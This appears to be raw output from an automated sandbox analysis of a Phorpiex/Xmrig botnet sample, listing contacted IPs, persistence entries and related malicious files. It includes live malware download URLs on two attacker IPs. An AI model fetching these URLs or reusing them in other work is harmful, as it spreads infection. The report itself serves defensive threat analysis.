                          http://91.202.233.141/2sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://185.215.113.66/5rosoftsysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://91.202.233.141/5sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://91.202.233.141/3sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://91.202.233.141/4sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://91.202.233.141/IBSTSWSONLMozilla/5.0204078699.exe, 0000000E.00000000.1959011448.0000000000572000.00000002.00000001.01000000.0000000A.sdmp, 204078699.exe, 0000000E.00000002.1994803487.0000000000572000.00000002.00000001.01000000.0000000A.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://91.202.233.141/2tsysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://91.202.233.141/2jsysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://91.202.233.141/IBSTSWSONLM204078699.exe, 0000000E.00000002.1994989301.0000000000CFF000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://185.215.113.66/5jsysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://contoso.com/powershell.exe, 00000011.00000002.2149957410.00000126C7650000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.2149957410.00000126C7650000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.66/newtpp.exe, 00000000.00000002.1685665277.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, newtpp.exe, 00000000.00000000.1644877730.0000000000410000.00000002.00000001.01000000.00000003.sdmp, newtpp.exe, 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmp, sysnldcvmr.exe, 00000001.00000000.1675357252.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000002.00000000.1789582363.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpfalse
                                		high
                                http://www.microsoft.cpowershell.exe, 00000011.00000002.2158827753.00000126CFCEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.2120710766.00000126B75E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://185.215.113.66/tcoin.php?s=%s191563587.exefalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.microsoft.Zpowershell.exe, 00000011.00000002.2158827753.00000126CFCEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://nuget.org/NuGet.exepowershell.exe, 00000011.00000002.2149957410.00000126C7650000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000011.00000002.2120710766.00000126B7809000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://185.215.113.66/3:sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://185.215.113.66/1~sysnldcvmr.exe, 00000001.00000003.1757590248.0000000000641000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000003.1757912131.0000000000640000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://185.215.113.66/3=sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://91.202.233.141/37sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000016.00000002.2297923755.00000236922E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/soap/encoding/sysnldcvmr.exe, 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmp, powershell.exe, 00000011.00000002.2120710766.00000126B7809000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000016.00000002.2297923755.00000236922E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%snewtpp.exe, 00000000.00000002.1685665277.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, newtpp.exe, 00000000.00000000.1644877730.0000000000410000.00000002.00000001.01000000.00000003.sdmp, newtpp.exe, 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmp, sysnldcvmr.exe, 00000001.00000000.1675357252.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000002.00000000.1789582363.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://185.215.113.66/tcoin.php?s=%sMozilla/5.0sysnldcvmr.exe, 00000001.00000003.2024730784.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 191563587.exe, 00000010.00000000.2044938619.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmp, 191563587.exe, 00000010.00000002.4115329354.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://contoso.com/Iconpowershell.exe, 00000011.00000002.2149957410.00000126C7650000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://185.215.113.66/5sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000673000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://185.215.113.66/4sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000673000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://185.215.113.66/3sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://185.215.113.66/2sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://185.215.113.84/nxmr.exe?2736615137.exe, 0000000B.00000002.2023976839.00000000010D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://185.215.113.66/1C:sysnldcvmr.exe, 00000001.00000003.1757912131.000000000064E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000003.1757590248.000000000064E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://91.202.233.141/27sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000016.00000002.2297923755.00000236922E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://185.215.113.66/1sysnldcvmr.exe, 00000001.00000003.1757912131.0000000000625000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000003.1757590248.0000000000641000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000003.1757590248.000000000064E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000003.1757912131.0000000000640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://185.215.113.66/4JJC:sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000673000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://91.202.233.141/2/sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://185.215.113.84/nxmr.exeystem322736615137.exe, 0000000B.00000002.2023976839.00000000010D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://185.215.113.66/16G-sysnldcvmr.exe, 00000001.00000003.1757912131.0000000000625000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://185.215.113.66/1:G)sysnldcvmr.exe, 00000001.00000003.1757912131.0000000000625000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000011.00000002.2120710766.00000126B7809000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://91.202.233.141/IBSTSWSONL204078699.exe, 0000000E.00000002.1994989301.0000000000CBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://185.215.113.66/4Gsysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://xmrig.com/docs/algorithmswinupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpfalse
                                                              		high
                                                              http://91.202.233.141/2#sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://aka.ms/pscore68powershell.exe, 00000011.00000002.2120710766.00000126B75E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://185.215.113.66/2msysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                89.249.62.92
                                                                		unknownRussian Federation
                                                                		50164RFTV-ASRUfalse
                                                                37.99.52.150
                                                                		unknownKazakhstan
                                                                		21299KAR-TEL-ASAlmatyRepublicofKazakhstanKZtrue
                                                                134.35.205.29
                                                                		unknownYemen
                                                                		30873PTC-YEMENNETYEtrue
                                                                189.150.7.25
                                                                		unknownMexico
                                                                		8151UninetSAdeCVMXtrue
                                                                188.160.12.49
                                                                		unknownSyrian Arab Republic
                                                                		29256INT-PDN-STE-ASSTEPDNInternalASSYtrue
                                                                151.232.164.243
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		58224TCIIRfalse
                                                                5.219.134.102
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		58224TCIIRtrue
                                                                213.230.108.92
                                                                		unknownUzbekistan
                                                                		8193BRM-ASUZtrue
                                                                91.202.233.141
                                                                		unknownRussian Federation
                                                                		9009M247GBtrue
                                                                91.185.146.150
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		12880DCI-ASIRtrue
                                                                77.81.130.60
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		12880DCI-ASIRtrue
                                                                62.212.36.229
                                                                		unknownGeorgia
                                                                		34797SYSTEM-NETGEfalse
                                                                87.237.234.195
                                                                		unknownUzbekistan
                                                                		39032ISPETCUZfalse
                                                                91.185.130.166
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		12880DCI-ASIRtrue
                                                                2.135.246.18
                                                                		unknownKazakhstan
                                                                		9198KAZTELECOM-ASKZtrue
                                                                134.35.126.112
                                                                		unknownYemen
                                                                		30873PTC-YEMENNETYEtrue
                                                                129.122.183.25
                                                                		unknownAngola
                                                                		37645ZAP-AngolaAOfalse
                                                                176.214.150.127
                                                                		unknownRussian Federation
                                                                		59713ERTH-KURSK-ASRUfalse
                                                                198.163.193.96
                                                                		unknownUnited States
                                                                		7029WINDSTREAMUStrue
                                                                2.191.61.218
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		12880DCI-ASIRfalse
                                                                185.215.113.84
                                                                		unknownPortugal
                                                                		206894WHOLESALECONNECTIONSNLfalse
                                                                38.166.109.33
                                                                		unknownUnited States
                                                                		174COGENT-174USfalse
                                                                178.253.102.214
                                                                		unknownSyrian Arab Republic
                                                                		29256INT-PDN-STE-ASSTEPDNInternalASSYfalse
                                                                182.188.65.58
                                                                		unknownPakistan
                                                                		45595PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKtrue
                                                                89.218.218.206
                                                                		unknownKazakhstan
                                                                		9198KAZTELECOM-ASKZtrue
                                                                2.176.90.19
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		12880DCI-ASIRtrue
                                                                62.114.143.56
                                                                		unknownEgypt
                                                                		36992ETISALAT-MISREGfalse
                                                                176.113.143.77
                                                                		unknownTajikistan
                                                                		44027SATURN-ONLINE-ASElcatUplinkRUtrue
                                                                188.124.116.191
                                                                		unknownRussian Federation
                                                                		48475OSKOLNET-ASRUfalse
                                                                89.249.62.87
                                                                		unknownRussian Federation
                                                                		50164RFTV-ASRUtrue
                                                                102.215.170.62
                                                                		unknownunknown
                                                                		36926CKL1-ASNKEfalse
                                                                189.133.187.71
                                                                		unknownMexico
                                                                		8151UninetSAdeCVMXfalse
                                                                2.185.189.167
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		58224TCIIRfalse
                                                                5.74.223.211
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		12880DCI-ASIRfalse
                                                                188.212.145.214
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		12880DCI-ASIRtrue
                                                                239.255.255.250
                                                                		unknownReserved
                                                                		unknownunknownfalse
                                                                91.231.253.155
                                                                		unknownRussian Federation
                                                                		44027SATURN-ONLINE-ASElcatUplinkRUfalse
                                                                178.71.163.141
                                                                		unknownRussian Federation
                                                                		12389ROSTELECOM-ASRUtrue
                                                                82.200.169.186
                                                                		unknownKazakhstan
                                                                		9198KAZTELECOM-ASKZtrue
                                                                89.44.147.157
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		22769DDOSING-BGP-NETWORKUStrue
                                                                187.223.139.73
                                                                		unknownMexico
                                                                		8151UninetSAdeCVMXtrue
                                                                80.191.218.209
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		58224TCIIRtrue
                                                                134.35.104.95
                                                                		unknownYemen
                                                                		30873PTC-YEMENNETYEtrue
                                                                59.91.192.115
                                                                		unknownIndia
                                                                		9829BSNL-NIBNationalInternetBackboneINfalse
                                                                5.251.47.42
                                                                		unknownKazakhstan
                                                                		9198KAZTELECOM-ASKZfalse
                                                                94.141.226.56
                                                                		unknownRussian Federation
                                                                		41798TTC-ASJSCTranstelecomKZfalse
                                                                185.215.113.66
                                                                		twizthash.netPortugal
                                                                		206894WHOLESALECONNECTIONSNLfalse
                                                                195.158.18.194
                                                                		unknownUzbekistan
                                                                		8193BRM-ASUZtrue
                                                                2.190.67.184
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		12880DCI-ASIRtrue
                                                                187.230.142.108
                                                                		unknownMexico
                                                                		8151UninetSAdeCVMXfalse
                                                                151.245.127.72
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		31549RASANAIRfalse
                                                                189.167.57.71
                                                                		unknownMexico
                                                                		8151UninetSAdeCVMXfalse
                                                                2.132.15.134
                                                                		unknownKazakhstan
                                                                		9198KAZTELECOM-ASKZfalse
                                                                217.30.160.219
                                                                		unknownUzbekistan
                                                                		39032ISPETCUZtrue
                                                                134.35.107.95
                                                                		unknownYemen
                                                                		30873PTC-YEMENNETYEtrue
                                                                94.230.44.71
                                                                		unknownRussian Federation
                                                                		48475OSKOLNET-ASRUfalse
                                                                77.44.192.46
                                                                		unknownSyrian Arab Republic
                                                                		29256INT-PDN-STE-ASSTEPDNInternalASSYtrue
                                                                82.137.239.235
                                                                		unknownSyrian Arab Republic
                                                                		29256INT-PDN-STE-ASSTEPDNInternalASSYfalse
                                                                183.109.168.229
                                                                		unknownKorea Republic of
                                                                		4766KIXS-AS-KRKoreaTelecomKRfalse
                                                                38.224.37.24
                                                                		unknownUnited States
                                                                		174COGENT-174UStrue
                                                                2.177.228.237
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		12880DCI-ASIRtrue
                                                                195.158.21.74
                                                                		unknownUzbekistan
                                                                		8193BRM-ASUZtrue
                                                                90.156.163.33
                                                                		unknownRussian Federation
                                                                		25532MASTERHOST-ASMoscowRussiaRUfalse
                                                                78.137.64.239
                                                                		unknownYemen
                                                                		30873PTC-YEMENNETYEfalse
                                                                90.156.160.43
                                                                		unknownRussian Federation
                                                                		25532MASTERHOST-ASMoscowRussiaRUfalse
                                                                187.230.224.189
                                                                		unknownMexico
                                                                		8151UninetSAdeCVMXfalse
                                                                41.138.38.164
                                                                		unknownNiger
                                                                		37385SONITELNEtrue
                                                                89.249.62.7
                                                                		unknownRussian Federation
                                                                		50164RFTV-ASRUfalse
                                                                31.171.185.170
                                                                		unknownKazakhstan
                                                                		60411KAZINTERCOM-ASKZfalse
                                                                5.239.147.239
                                                                		unknownIran (ISLAMIC Republic Of)
                                                                		58224TCIIRfalse
                                                                92.46.228.246
                                                                		unknownKazakhstan
                                                                		9198KAZTELECOM-ASKZtrue
                                                                80.71.213.158
                                                                		unknownRussian Federation
                                                                		12389ROSTELECOM-ASRUfalse
                                                                89.218.244.178
                                                                		unknownKazakhstan
                                                                		9198KAZTELECOM-ASKZfalse
                                                                154.118.201.198
                                                                		unknownAngola
                                                                		37645ZAP-AngolaAOfalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1565489
                                                                Start date and time:2024-11-30 01:54:04 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 13m 24s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:34
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Sample name:newtpp.exe
                                                                Detection:MAL
                                                                Classification:mal100.evad.mine.winEXE@44/33@1/74
                                                                EGA Information:
                                                                • Successful, ratio: 66.7%
                                                                HCA Information:
                                                                • Successful, ratio: 77%
                                                                • Number of executed functions: 93
                                                                • Number of non-executed functions: 175
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                • Excluded IPs from analysis (whitelisted): 20.72.235.82
                                                                • Excluded domains from analysis (whitelisted): redir.update.msft.com.trafficmanager.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, www.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target 1088610392.exe, PID 7596 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7640 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 8128 because it is empty
                                                                • Execution Graph export aborted for target winupsecvmgr.exe, PID 7860 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                • Report size getting too big, too many NtReadFile calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                00:54:58AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysnldcvmr.exe
                                                                00:55:39Task SchedulerRun new task: Microsoft Windows Security path: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                19:54:59API Interceptor546086x Sleep call for process: sysnldcvmr.exe modified
                                                                19:55:35API Interceptor111x Sleep call for process: powershell.exe modified
                                                                19:56:09API Interceptor210754x Sleep call for process: conhost.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                89.249.62.92SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                  37.99.52.150file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                    213.230.108.92SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exeGet hashmaliciousPhorpiexBrowse
                                                                      eZvOzNlUAa.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                        7Rd5QLACvV.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          91.202.233.141LM94OE0VNK.exeGet hashmaliciousUnknownBrowse
                                                                          • 91.202.233.141/gonup
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • 91.202.233.141/HKLMINSTOK
                                                                          hH13f3q2kF.exeGet hashmaliciousUnknownBrowse
                                                                          • 91.202.233.141/WINLASTFIX
                                                                          U9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 91.202.233.141/3
                                                                          ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 91.202.233.141/4
                                                                          Bjl3geiFEK.exeGet hashmaliciousPhorpiexBrowse
                                                                          • 91.202.233.141/dwntbl
                                                                          T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 91.202.233.141/5
                                                                          lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 91.202.233.141/5
                                                                          Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 91.202.233.141/1
                                                                          thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                                                          • 91.202.233.141/dwntbl

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          twizthash.netU9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 185.215.113.66
                                                                          ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 185.215.113.66
                                                                          T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 185.215.113.66
                                                                          lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 185.215.113.66
                                                                          Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 185.215.113.66
                                                                          bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 185.215.113.66
                                                                          file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 185.215.113.66
                                                                          dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 185.215.113.66
                                                                          GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 185.215.113.66
                                                                          0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 185.215.113.66

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          KAR-TEL-ASAlmatyRepublicofKazakhstanKZnuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 91.244.109.17
                                                                          ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 145.249.227.150
                                                                          belks.x86.elfGet hashmaliciousMiraiBrowse
                                                                          • 92.49.241.174
                                                                          lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 145.249.227.150
                                                                          la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                          • 92.55.176.15
                                                                          la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                          • 5.34.126.177
                                                                          la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                          • 145.249.235.87
                                                                          la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                          • 212.76.5.218
                                                                          file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 37.99.52.150
                                                                          dumped.exeGet hashmaliciousBdaejec, XmrigBrowse
                                                                          • 194.187.138.162
                                                                          PTC-YEMENNETYEarm6.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 213.247.26.253
                                                                          qkbfi86.elfGet hashmaliciousMiraiBrowse
                                                                          • 178.130.111.145
                                                                          U9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 188.209.237.163
                                                                          lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 78.137.95.224
                                                                          powerpc.elfGet hashmaliciousUnknownBrowse
                                                                          • 178.130.111.195
                                                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                          • 134.35.25.237
                                                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                          • 134.35.82.159
                                                                          la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                          • 94.26.199.5
                                                                          bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 5.255.14.2
                                                                          dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 109.200.190.28
                                                                          RFTV-ASRUthcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                                                          • 89.249.62.7
                                                                          file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 89.249.62.14
                                                                          bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                                                                          • 89.249.62.7
                                                                          file.exeGet hashmaliciousPhorpiexBrowse
                                                                          • 89.249.62.14
                                                                          SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 89.249.62.7
                                                                          SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 89.249.62.92
                                                                          SecuriteInfo.com.Trojan.DownLoader46.2135.7325.13890.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                          • 89.249.62.7
                                                                          lRT1FK9PcL.exeGet hashmaliciousPhorpiexBrowse
                                                                          • 89.249.62.7
                                                                          SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeGet hashmaliciousPhorpiexBrowse
                                                                          • 89.249.62.87
                                                                          file.exeGet hashmaliciousPhorpiexBrowse
                                                                          • 89.249.62.14

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nxmr[1].exeU9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
